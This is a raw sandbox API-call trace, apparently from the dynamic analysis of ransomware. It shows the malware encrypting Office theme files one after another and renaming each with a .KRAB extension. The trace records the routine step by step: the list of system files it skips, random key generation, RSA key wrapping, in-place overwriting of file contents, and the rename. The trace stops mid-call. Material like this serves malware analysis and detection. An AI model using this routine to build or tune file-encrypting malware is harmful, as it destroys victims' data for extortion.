lstrcmpW (lpString1="TM04033921[[fn=Damask]].thmx", lpString2=".") returned 1 [0067.176] lstrcmpW (lpString1="TM04033921[[fn=Damask]].thmx", lpString2="..") returned 1 [0067.176] lstrcatW (in: lpString1="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Microsoft\\Templates\\LiveContent\\16\\Managed\\Document Themes\\1033\\", lpString2="TM04033921[[fn=Damask]].thmx" | out: lpString1="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Microsoft\\Templates\\LiveContent\\16\\Managed\\Document Themes\\1033\\TM04033921[[fn=Damask]].thmx") returned="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Microsoft\\Templates\\LiveContent\\16\\Managed\\Document Themes\\1033\\TM04033921[[fn=Damask]].thmx" [0067.176] VirtualAlloc (lpAddress=0x0, dwSize=0x200, flAllocationType=0x3000, flProtect=0x4) returned 0x2ea0000 [0067.177] wsprintfW (in: param_1=0x2ea0000, param_2="%s.KRAB" | out: param_1="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Microsoft\\Templates\\LiveContent\\16\\Managed\\Document Themes\\1033\\TM04033921[[fn=Damask]].thmx.KRAB") returned 135 [0067.177] lstrlenW (lpString="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Microsoft\\Templates\\LiveContent\\16\\Managed\\Document Themes\\1033\\TM04033921[[fn=Damask]].thmx") returned 130 [0067.177] lstrlenW (lpString=".thmx") returned 5 [0067.177] VirtualAlloc (lpAddress=0x0, dwSize=0xe, flAllocationType=0x3000, flProtect=0x4) returned 0x2f30000 [0067.177] wsprintfW (in: param_1=0x2f30000, param_2="%s " | out: param_1=".thmx ") returned 6 [0067.177] VirtualFree (lpAddress=0x2f30000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0067.178] lstrlenW (lpString="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Microsoft\\Templates\\LiveContent\\16\\Managed\\Document Themes\\1033\\TM04033921[[fn=Damask]].thmx") returned 130 [0067.178] lstrlenW (lpString="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Microsoft\\Templates\\LiveContent\\16\\Managed\\Document Themes\\1033\\TM04033921[[fn=Damask]].thmx") returned 130 [0067.178] lstrcmpiW (lpString1="TM04033921[[fn=Damask]].thmx", lpString2="desktop.ini") returned 1 [0067.178] lstrcmpiW (lpString1="TM04033921[[fn=Damask]].thmx", lpString2="autorun.inf") returned 1 [0067.178] lstrcmpiW (lpString1="TM04033921[[fn=Damask]].thmx", lpString2="ntuser.dat") returned 1 [0067.178] lstrcmpiW (lpString1="TM04033921[[fn=Damask]].thmx", lpString2="iconcache.db") returned 1 [0067.178] lstrcmpiW (lpString1="TM04033921[[fn=Damask]].thmx", lpString2="bootsect.bak") returned 1 [0067.178] lstrcmpiW (lpString1="TM04033921[[fn=Damask]].thmx", lpString2="boot.ini") returned 1 [0067.178] lstrcmpiW (lpString1="TM04033921[[fn=Damask]].thmx", lpString2="ntuser.dat.log") returned 1 [0067.178] lstrcmpiW (lpString1="TM04033921[[fn=Damask]].thmx", lpString2="thumbs.db") returned 1 [0067.178] lstrcmpiW (lpString1="TM04033921[[fn=Damask]].thmx", lpString2="KRAB-DECRYPT.html") returned 1 [0067.178] lstrcmpiW (lpString1="TM04033921[[fn=Damask]].thmx", lpString2="KRAB-DECRYPT.txt") returned 1 [0067.178] lstrcmpiW (lpString1="TM04033921[[fn=Damask]].thmx", lpString2="CRAB-DECRYPT.txt") returned 1 [0067.178] lstrcmpiW (lpString1="TM04033921[[fn=Damask]].thmx", lpString2="ntldr") returned 1 [0067.178] lstrcmpiW (lpString1="TM04033921[[fn=Damask]].thmx", lpString2="NTDETECT.COM") returned 1 [0067.179] lstrcmpiW (lpString1="TM04033921[[fn=Damask]].thmx", lpString2="Bootfont.bin") returned 1 [0067.179] VirtualAlloc (lpAddress=0x0, dwSize=0x208, flAllocationType=0x3000, flProtect=0x4) returned 0x2f30000 [0067.179] CryptAcquireContextW (in: phProv=0x338dd34, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x338dd34*=0xfbbcc0) returned 1 [0067.179] VirtualAlloc (lpAddress=0x0, dwSize=0x21, flAllocationType=0x3000, flProtect=0x40) returned 0x2f40000 [0067.180] GetModuleHandleA (lpModuleName="Advapi32.dll") returned 0x77990000 [0067.180] GetProcAddress (hModule=0x77990000, lpProcName="CryptGenRandom") returned 0x779b0df0 [0067.180] CryptGenRandom (in: hProv=0xfbbcc0, dwLen=0x20, pbBuffer=0x338ddcc | out: pbBuffer=0x338ddcc) returned 1 [0067.180] CryptReleaseContext (hProv=0xfbbcc0, dwFlags=0x0) returned 1 [0067.180] VirtualFree (lpAddress=0x2f40000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0067.180] CryptAcquireContextW (in: phProv=0x338dd34, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x338dd34*=0xfbb5d8) returned 1 [0067.181] VirtualAlloc (lpAddress=0x0, dwSize=0x9, flAllocationType=0x3000, flProtect=0x40) returned 0x2f40000 [0067.181] GetModuleHandleA (lpModuleName="Advapi32.dll") returned 0x77990000 [0067.181] GetProcAddress (hModule=0x77990000, lpProcName="CryptGenRandom") returned 0x779b0df0 [0067.181] CryptGenRandom (in: hProv=0xfbb5d8, dwLen=0x8, pbBuffer=0x338ddec | out: pbBuffer=0x338ddec) returned 1 [0067.181] CryptReleaseContext (hProv=0xfbb5d8, dwFlags=0x0) returned 1 [0067.181] VirtualFree (lpAddress=0x2f40000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0067.182] CryptAcquireContextW (in: phProv=0x338dd2c, szContainer=0x0, szProvider="Microsoft Enhanced Cryptographic Provider v1.0", dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x338dd2c*=0xfbc078) returned 1 [0067.182] CryptImportKey (in: hProv=0xfbc078, pbData=0x2e90000, dwDataLen=0x114, hPubKey=0x0, dwFlags=0x0, phKey=0x338dd30 | out: phKey=0x338dd30*=0xfbdce0) returned 1 [0067.182] CryptGetKeyParam (in: hKey=0xfbdce0, dwParam=0x8, pbData=0x338dd24, pdwDataLen=0x338dd28, dwFlags=0x0 | out: pbData=0x338dd24*=0x800, pdwDataLen=0x338dd28*=0x4) returned 1 [0067.182] CryptEncrypt (in: hKey=0xfbdce0, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x2f30000*, pdwDataLen=0x338dd5c*=0xc8, dwBufLen=0x100 | out: pbData=0x2f30000*, pdwDataLen=0x338dd5c*=0x100) returned 1 [0067.183] GetLastError () returned 0x0 [0067.183] CryptDestroyKey (hKey=0xfbdce0) returned 1 [0067.183] CryptReleaseContext (hProv=0xfbc078, dwFlags=0x0) returned 1 [0067.183] CryptAcquireContextW (in: phProv=0x338dd2c, szContainer=0x0, szProvider="Microsoft Enhanced Cryptographic Provider v1.0", dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x338dd2c*=0xfbb5d8) returned 1 [0067.183] CryptImportKey (in: hProv=0xfbb5d8, pbData=0x2e90000, dwDataLen=0x114, hPubKey=0x0, dwFlags=0x0, phKey=0x338dd30 | out: phKey=0x338dd30*=0xfbdce0) returned 1 [0067.183] CryptGetKeyParam (in: hKey=0xfbdce0, dwParam=0x8, pbData=0x338dd24, pdwDataLen=0x338dd28, dwFlags=0x0 | out: pbData=0x338dd24*=0x800, pdwDataLen=0x338dd28*=0x4) returned 1 [0067.183] CryptEncrypt (in: hKey=0xfbdce0, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x2f30100*, pdwDataLen=0x338dd5c*=0xc8, dwBufLen=0x100 | out: pbData=0x2f30100*, pdwDataLen=0x338dd5c*=0x100) returned 1 [0067.184] GetLastError () returned 0x0 [0067.184] CryptDestroyKey (hKey=0xfbdce0) returned 1 [0067.184] CryptReleaseContext (hProv=0xfbb5d8, dwFlags=0x0) returned 1 [0067.184] CreateFileW (lpFileName="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Microsoft\\Templates\\LiveContent\\16\\Managed\\Document Themes\\1033\\TM04033921[[fn=Damask]].thmx" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\roaming\\microsoft\\templates\\livecontent\\16\\managed\\document themes\\1033\\tm04033921[[fn=damask]].thmx"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x440 [0067.184] VirtualAlloc (lpAddress=0x0, dwSize=0x100001, flAllocationType=0x3000, flProtect=0x4) returned 0x35e0000 [0067.185] VirtualAlloc (lpAddress=0x0, dwSize=0x100005, flAllocationType=0x3000, flProtect=0x4) returned 0x3870000 [0067.185] ReadFile (in: hFile=0x440, lpBuffer=0x35e0000, nNumberOfBytesToRead=0x100000, lpNumberOfBytesRead=0x338ddfc, lpOverlapped=0x0 | out: lpBuffer=0x35e0000*, lpNumberOfBytesRead=0x338ddfc*=0x100000, lpOverlapped=0x0) returned 1 [0067.293] SetFilePointerEx (in: hFile=0x440, liDistanceToMove=0xfff00000, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0067.293] WriteFile (in: hFile=0x440, lpBuffer=0x3870000*, nNumberOfBytesToWrite=0x100000, lpNumberOfBytesWritten=0x338ddf8, lpOverlapped=0x0 | out: lpBuffer=0x3870000*, lpNumberOfBytesWritten=0x338ddf8*=0x100000, lpOverlapped=0x0) returned 1 [0067.295] ReadFile (in: hFile=0x440, lpBuffer=0x35e0000, nNumberOfBytesToRead=0x100000, lpNumberOfBytesRead=0x338ddfc, lpOverlapped=0x0 | out: lpBuffer=0x35e0000*, lpNumberOfBytesRead=0x338ddfc*=0x100000, lpOverlapped=0x0) returned 1 [0067.308] SetFilePointerEx (in: hFile=0x440, liDistanceToMove=0xfff00000, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0067.308] WriteFile (in: hFile=0x440, lpBuffer=0x3870000*, nNumberOfBytesToWrite=0x100000, lpNumberOfBytesWritten=0x338ddf8, lpOverlapped=0x0 | out: lpBuffer=0x3870000*, lpNumberOfBytesWritten=0x338ddf8*=0x100000, lpOverlapped=0x0) returned 1 [0067.310] ReadFile (in: hFile=0x440, lpBuffer=0x35e0000, nNumberOfBytesToRead=0x100000, lpNumberOfBytesRead=0x338ddfc, lpOverlapped=0x0 | out: lpBuffer=0x35e0000*, lpNumberOfBytesRead=0x338ddfc*=0x1dbbf, lpOverlapped=0x0) returned 1 [0067.324] SetFilePointerEx (in: hFile=0x440, liDistanceToMove=0xfffe2441, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0067.324] WriteFile (in: hFile=0x440, lpBuffer=0x3870000*, nNumberOfBytesToWrite=0x1dbbf, lpNumberOfBytesWritten=0x338ddf8, lpOverlapped=0x0 | out: lpBuffer=0x3870000*, lpNumberOfBytesWritten=0x338ddf8*=0x1dbbf, lpOverlapped=0x0) returned 1 [0067.325] WriteFile (in: hFile=0x440, lpBuffer=0x2f30000*, nNumberOfBytesToWrite=0x208, lpNumberOfBytesWritten=0x338ddf8, lpOverlapped=0x0 | out: lpBuffer=0x2f30000*, lpNumberOfBytesWritten=0x338ddf8*=0x208, lpOverlapped=0x0) returned 1 [0067.325] VirtualFree (lpAddress=0x35e0000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0067.329] VirtualFree (lpAddress=0x3870000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0067.332] CloseHandle (hObject=0x440) returned 1 [0067.387] VirtualFree (lpAddress=0x2f30000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0067.388] MoveFileW (lpExistingFileName="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Microsoft\\Templates\\LiveContent\\16\\Managed\\Document Themes\\1033\\TM04033921[[fn=Damask]].thmx" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\roaming\\microsoft\\templates\\livecontent\\16\\managed\\document themes\\1033\\tm04033921[[fn=damask]].thmx"), lpNewFileName="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Microsoft\\Templates\\LiveContent\\16\\Managed\\Document Themes\\1033\\TM04033921[[fn=Damask]].thmx.KRAB" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\roaming\\microsoft\\templates\\livecontent\\16\\managed\\document themes\\1033\\tm04033921[[fn=damask]].thmx.krab")) returned 1 [0067.389] VirtualFree (lpAddress=0x2ea0000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0067.389] FindNextFileW (in: hFindFile=0xfbdae0, lpFindFileData=0x338de50 | out: lpFindFileData=0x338de50) returned 1 [0067.389] lstrcmpW (lpString1="TM04033925[[fn=Droplet]].thmx", lpString2=".") returned 1 [0067.389] lstrcmpW (lpString1="TM04033925[[fn=Droplet]].thmx", lpString2="..") returned 1 [0067.389] lstrcatW (in: lpString1="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Microsoft\\Templates\\LiveContent\\16\\Managed\\Document Themes\\1033\\", lpString2="TM04033925[[fn=Droplet]].thmx" | out: lpString1="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Microsoft\\Templates\\LiveContent\\16\\Managed\\Document Themes\\1033\\TM04033925[[fn=Droplet]].thmx") returned="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Microsoft\\Templates\\LiveContent\\16\\Managed\\Document Themes\\1033\\TM04033925[[fn=Droplet]].thmx" [0067.389] VirtualAlloc (lpAddress=0x0, dwSize=0x200, flAllocationType=0x3000, flProtect=0x4) returned 0x2ea0000 [0067.390] wsprintfW (in: param_1=0x2ea0000, param_2="%s.KRAB" | out: param_1="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Microsoft\\Templates\\LiveContent\\16\\Managed\\Document Themes\\1033\\TM04033925[[fn=Droplet]].thmx.KRAB") returned 136 [0067.390] lstrlenW (lpString="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Microsoft\\Templates\\LiveContent\\16\\Managed\\Document Themes\\1033\\TM04033925[[fn=Droplet]].thmx") returned 131 [0067.390] lstrlenW (lpString=".thmx") returned 5 [0067.390] VirtualAlloc (lpAddress=0x0, dwSize=0xe, flAllocationType=0x3000, flProtect=0x4) returned 0x2f30000 [0067.390] wsprintfW (in: param_1=0x2f30000, param_2="%s " | out: param_1=".thmx ") returned 6 [0067.390] VirtualFree (lpAddress=0x2f30000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0067.390] lstrlenW (lpString="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Microsoft\\Templates\\LiveContent\\16\\Managed\\Document Themes\\1033\\TM04033925[[fn=Droplet]].thmx") returned 131 [0067.390] lstrlenW (lpString="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Microsoft\\Templates\\LiveContent\\16\\Managed\\Document Themes\\1033\\TM04033925[[fn=Droplet]].thmx") returned 131 [0067.390] lstrcmpiW (lpString1="TM04033925[[fn=Droplet]].thmx", lpString2="desktop.ini") returned 1 [0067.391] lstrcmpiW (lpString1="TM04033925[[fn=Droplet]].thmx", lpString2="autorun.inf") returned 1 [0067.391] lstrcmpiW (lpString1="TM04033925[[fn=Droplet]].thmx", lpString2="ntuser.dat") returned 1 [0067.391] lstrcmpiW (lpString1="TM04033925[[fn=Droplet]].thmx", lpString2="iconcache.db") returned 1 [0067.391] lstrcmpiW (lpString1="TM04033925[[fn=Droplet]].thmx", lpString2="bootsect.bak") returned 1 [0067.391] lstrcmpiW (lpString1="TM04033925[[fn=Droplet]].thmx", lpString2="boot.ini") returned 1 [0067.391] lstrcmpiW (lpString1="TM04033925[[fn=Droplet]].thmx", lpString2="ntuser.dat.log") returned 1 [0067.391] lstrcmpiW (lpString1="TM04033925[[fn=Droplet]].thmx", lpString2="thumbs.db") returned 1 [0067.391] lstrcmpiW (lpString1="TM04033925[[fn=Droplet]].thmx", lpString2="KRAB-DECRYPT.html") returned 1 [0067.391] lstrcmpiW (lpString1="TM04033925[[fn=Droplet]].thmx", lpString2="KRAB-DECRYPT.txt") returned 1 [0067.391] lstrcmpiW (lpString1="TM04033925[[fn=Droplet]].thmx", lpString2="CRAB-DECRYPT.txt") returned 1 [0067.391] lstrcmpiW (lpString1="TM04033925[[fn=Droplet]].thmx", lpString2="ntldr") returned 1 [0067.391] lstrcmpiW (lpString1="TM04033925[[fn=Droplet]].thmx", lpString2="NTDETECT.COM") returned 1 [0067.391] lstrcmpiW (lpString1="TM04033925[[fn=Droplet]].thmx", lpString2="Bootfont.bin") returned 1 [0067.391] VirtualAlloc (lpAddress=0x0, dwSize=0x208, flAllocationType=0x3000, flProtect=0x4) returned 0x2f30000 [0067.391] CryptAcquireContextW (in: phProv=0x338dd34, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x338dd34*=0xfbbcc0) returned 1 [0067.392] VirtualAlloc (lpAddress=0x0, dwSize=0x21, flAllocationType=0x3000, flProtect=0x40) returned 0x2f40000 [0067.392] GetModuleHandleA (lpModuleName="Advapi32.dll") returned 0x77990000 [0067.392] GetProcAddress (hModule=0x77990000, lpProcName="CryptGenRandom") returned 0x779b0df0 [0067.392] CryptGenRandom (in: hProv=0xfbbcc0, dwLen=0x20, pbBuffer=0x338ddcc | out: pbBuffer=0x338ddcc) returned 1 [0067.392] CryptReleaseContext (hProv=0xfbbcc0, dwFlags=0x0) returned 1 [0067.392] VirtualFree (lpAddress=0x2f40000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0067.393] CryptAcquireContextW (in: phProv=0x338dd34, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x338dd34*=0xfbb198) returned 1 [0067.393] VirtualAlloc (lpAddress=0x0, dwSize=0x9, flAllocationType=0x3000, flProtect=0x40) returned 0x2f40000 [0067.393] GetModuleHandleA (lpModuleName="Advapi32.dll") returned 0x77990000 [0067.394] GetProcAddress (hModule=0x77990000, lpProcName="CryptGenRandom") returned 0x779b0df0 [0067.394] CryptGenRandom (in: hProv=0xfbb198, dwLen=0x8, pbBuffer=0x338ddec | out: pbBuffer=0x338ddec) returned 1 [0067.394] CryptReleaseContext (hProv=0xfbb198, dwFlags=0x0) returned 1 [0067.394] VirtualFree (lpAddress=0x2f40000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0067.394] CryptAcquireContextW (in: phProv=0x338dd2c, szContainer=0x0, szProvider="Microsoft Enhanced Cryptographic Provider v1.0", dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x338dd2c*=0xfbb198) returned 1 [0067.395] CryptImportKey (in: hProv=0xfbb198, pbData=0x2e90000, dwDataLen=0x114, hPubKey=0x0, dwFlags=0x0, phKey=0x338dd30 | out: phKey=0x338dd30*=0xfbdce0) returned 1 [0067.395] CryptGetKeyParam (in: hKey=0xfbdce0, dwParam=0x8, pbData=0x338dd24, pdwDataLen=0x338dd28, dwFlags=0x0 | out: pbData=0x338dd24*=0x800, pdwDataLen=0x338dd28*=0x4) returned 1 [0067.395] CryptEncrypt (in: hKey=0xfbdce0, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x2f30000*, pdwDataLen=0x338dd5c*=0xc8, dwBufLen=0x100 | out: pbData=0x2f30000*, pdwDataLen=0x338dd5c*=0x100) returned 1 [0067.395] GetLastError () returned 0x0 [0067.395] CryptDestroyKey (hKey=0xfbdce0) returned 1 [0067.395] CryptReleaseContext (hProv=0xfbb198, dwFlags=0x0) returned 1 [0067.395] CryptAcquireContextW (in: phProv=0x338dd2c, szContainer=0x0, szProvider="Microsoft Enhanced Cryptographic Provider v1.0", dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x338dd2c*=0xfbc078) returned 1 [0067.395] CryptImportKey (in: hProv=0xfbc078, pbData=0x2e90000, dwDataLen=0x114, hPubKey=0x0, dwFlags=0x0, phKey=0x338dd30 | out: phKey=0x338dd30*=0xfbdce0) returned 1 [0067.396] CryptGetKeyParam (in: hKey=0xfbdce0, dwParam=0x8, pbData=0x338dd24, pdwDataLen=0x338dd28, dwFlags=0x0 | out: pbData=0x338dd24*=0x800, pdwDataLen=0x338dd28*=0x4) returned 1 [0067.396] CryptEncrypt (in: hKey=0xfbdce0, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x2f30100*, pdwDataLen=0x338dd5c*=0xc8, dwBufLen=0x100 | out: pbData=0x2f30100*, pdwDataLen=0x338dd5c*=0x100) returned 1 [0067.396] GetLastError () returned 0x0 [0067.396] CryptDestroyKey (hKey=0xfbdce0) returned 1 [0067.396] CryptReleaseContext (hProv=0xfbc078, dwFlags=0x0) returned 1 [0067.396] CreateFileW (lpFileName="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Microsoft\\Templates\\LiveContent\\16\\Managed\\Document Themes\\1033\\TM04033925[[fn=Droplet]].thmx" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\roaming\\microsoft\\templates\\livecontent\\16\\managed\\document themes\\1033\\tm04033925[[fn=droplet]].thmx"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x440 [0067.402] VirtualAlloc (lpAddress=0x0, dwSize=0x100001, flAllocationType=0x3000, flProtect=0x4) returned 0x35e0000 [0067.403] VirtualAlloc (lpAddress=0x0, dwSize=0x100005, flAllocationType=0x3000, flProtect=0x4) returned 0x3870000 [0067.403] ReadFile (in: hFile=0x440, lpBuffer=0x35e0000, nNumberOfBytesToRead=0x100000, lpNumberOfBytesRead=0x338ddfc, lpOverlapped=0x0 | out: lpBuffer=0x35e0000*, lpNumberOfBytesRead=0x338ddfc*=0x100000, lpOverlapped=0x0) returned 1 [0067.534] SetFilePointerEx (in: hFile=0x440, liDistanceToMove=0xfff00000, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0067.534] WriteFile (in: hFile=0x440, lpBuffer=0x3870000*, nNumberOfBytesToWrite=0x100000, lpNumberOfBytesWritten=0x338ddf8, lpOverlapped=0x0 | out: lpBuffer=0x3870000*, lpNumberOfBytesWritten=0x338ddf8*=0x100000, lpOverlapped=0x0) returned 1 [0067.536] ReadFile (in: hFile=0x440, lpBuffer=0x35e0000, nNumberOfBytesToRead=0x100000, lpNumberOfBytesRead=0x338ddfc, lpOverlapped=0x0 | out: lpBuffer=0x35e0000*, lpNumberOfBytesRead=0x338ddfc*=0xab70b, lpOverlapped=0x0) returned 1 [0067.548] SetFilePointerEx (in: hFile=0x440, liDistanceToMove=0xfff548f5, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0067.548] WriteFile (in: hFile=0x440, lpBuffer=0x3870000*, nNumberOfBytesToWrite=0xab70b, lpNumberOfBytesWritten=0x338ddf8, lpOverlapped=0x0 | out: lpBuffer=0x3870000*, lpNumberOfBytesWritten=0x338ddf8*=0xab70b, lpOverlapped=0x0) returned 1 [0067.566] WriteFile (in: hFile=0x440, lpBuffer=0x2f30000*, nNumberOfBytesToWrite=0x208, lpNumberOfBytesWritten=0x338ddf8, lpOverlapped=0x0 | out: lpBuffer=0x2f30000*, lpNumberOfBytesWritten=0x338ddf8*=0x208, lpOverlapped=0x0) returned 1 [0067.566] VirtualFree (lpAddress=0x35e0000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0067.570] VirtualFree (lpAddress=0x3870000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0067.588] CloseHandle (hObject=0x440) returned 1 [0067.654] VirtualFree (lpAddress=0x2f30000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0067.654] MoveFileW (lpExistingFileName="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Microsoft\\Templates\\LiveContent\\16\\Managed\\Document Themes\\1033\\TM04033925[[fn=Droplet]].thmx" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\roaming\\microsoft\\templates\\livecontent\\16\\managed\\document themes\\1033\\tm04033925[[fn=droplet]].thmx"), lpNewFileName="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Microsoft\\Templates\\LiveContent\\16\\Managed\\Document Themes\\1033\\TM04033925[[fn=Droplet]].thmx.KRAB" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\roaming\\microsoft\\templates\\livecontent\\16\\managed\\document themes\\1033\\tm04033925[[fn=droplet]].thmx.krab")) returned 1 [0067.655] VirtualFree (lpAddress=0x2ea0000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0067.656] FindNextFileW (in: hFindFile=0xfbdae0, lpFindFileData=0x338de50 | out: lpFindFileData=0x338de50) returned 1 [0067.656] lstrcmpW (lpString1="TM04033927[[fn=Main Event]].thmx", lpString2=".") returned 1 [0067.656] lstrcmpW (lpString1="TM04033927[[fn=Main Event]].thmx", lpString2="..") returned 1 [0067.656] lstrcatW (in: lpString1="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Microsoft\\Templates\\LiveContent\\16\\Managed\\Document Themes\\1033\\", lpString2="TM04033927[[fn=Main Event]].thmx" | out: lpString1="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Microsoft\\Templates\\LiveContent\\16\\Managed\\Document Themes\\1033\\TM04033927[[fn=Main Event]].thmx") returned="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Microsoft\\Templates\\LiveContent\\16\\Managed\\Document Themes\\1033\\TM04033927[[fn=Main Event]].thmx" [0067.656] VirtualAlloc (lpAddress=0x0, dwSize=0x200, flAllocationType=0x3000, flProtect=0x4) returned 0x2ea0000 [0067.656] wsprintfW (in: param_1=0x2ea0000, param_2="%s.KRAB" | out: param_1="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Microsoft\\Templates\\LiveContent\\16\\Managed\\Document Themes\\1033\\TM04033927[[fn=Main Event]].thmx.KRAB") returned 139 [0067.656] lstrlenW (lpString="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Microsoft\\Templates\\LiveContent\\16\\Managed\\Document Themes\\1033\\TM04033927[[fn=Main Event]].thmx") returned 134 [0067.656] lstrlenW (lpString=".thmx") returned 5 [0067.656] VirtualAlloc (lpAddress=0x0, dwSize=0xe, flAllocationType=0x3000, flProtect=0x4) returned 0x2f30000 [0067.657] wsprintfW (in: param_1=0x2f30000, param_2="%s " | out: param_1=".thmx ") returned 6 [0067.657] VirtualFree (lpAddress=0x2f30000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0067.657] lstrlenW (lpString="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Microsoft\\Templates\\LiveContent\\16\\Managed\\Document Themes\\1033\\TM04033927[[fn=Main Event]].thmx") returned 134 [0067.657] lstrlenW (lpString="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Microsoft\\Templates\\LiveContent\\16\\Managed\\Document Themes\\1033\\TM04033927[[fn=Main Event]].thmx") returned 134 [0067.657] lstrcmpiW (lpString1="TM04033927[[fn=Main Event]].thmx", lpString2="desktop.ini") returned 1 [0067.657] lstrcmpiW (lpString1="TM04033927[[fn=Main Event]].thmx", lpString2="autorun.inf") returned 1 [0067.657] lstrcmpiW (lpString1="TM04033927[[fn=Main Event]].thmx", lpString2="ntuser.dat") returned 1 [0067.657] lstrcmpiW (lpString1="TM04033927[[fn=Main Event]].thmx", lpString2="iconcache.db") returned 1 [0067.657] lstrcmpiW (lpString1="TM04033927[[fn=Main Event]].thmx", lpString2="bootsect.bak") returned 1 [0067.657] lstrcmpiW (lpString1="TM04033927[[fn=Main Event]].thmx", lpString2="boot.ini") returned 1 [0067.658] lstrcmpiW (lpString1="TM04033927[[fn=Main Event]].thmx", lpString2="ntuser.dat.log") returned 1 [0067.658] lstrcmpiW (lpString1="TM04033927[[fn=Main Event]].thmx", lpString2="thumbs.db") returned 1 [0067.658] lstrcmpiW (lpString1="TM04033927[[fn=Main Event]].thmx", lpString2="KRAB-DECRYPT.html") returned 1 [0067.658] lstrcmpiW (lpString1="TM04033927[[fn=Main Event]].thmx", lpString2="KRAB-DECRYPT.txt") returned 1 [0067.658] lstrcmpiW (lpString1="TM04033927[[fn=Main Event]].thmx", lpString2="CRAB-DECRYPT.txt") returned 1 [0067.658] lstrcmpiW (lpString1="TM04033927[[fn=Main Event]].thmx", lpString2="ntldr") returned 1 [0067.658] lstrcmpiW (lpString1="TM04033927[[fn=Main Event]].thmx", lpString2="NTDETECT.COM") returned 1 [0067.658] lstrcmpiW (lpString1="TM04033927[[fn=Main Event]].thmx", lpString2="Bootfont.bin") returned 1 [0067.658] VirtualAlloc (lpAddress=0x0, dwSize=0x208, flAllocationType=0x3000, flProtect=0x4) returned 0x2f30000 [0067.658] CryptAcquireContextW (in: phProv=0x338dd34, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x338dd34*=0xfbbcc0) returned 1 [0067.659] VirtualAlloc (lpAddress=0x0, dwSize=0x21, flAllocationType=0x3000, flProtect=0x40) returned 0x2f40000 [0067.659] GetModuleHandleA (lpModuleName="Advapi32.dll") returned 0x77990000 [0067.663] GetProcAddress (hModule=0x77990000, lpProcName="CryptGenRandom") returned 0x779b0df0 [0067.663] CryptGenRandom (in: 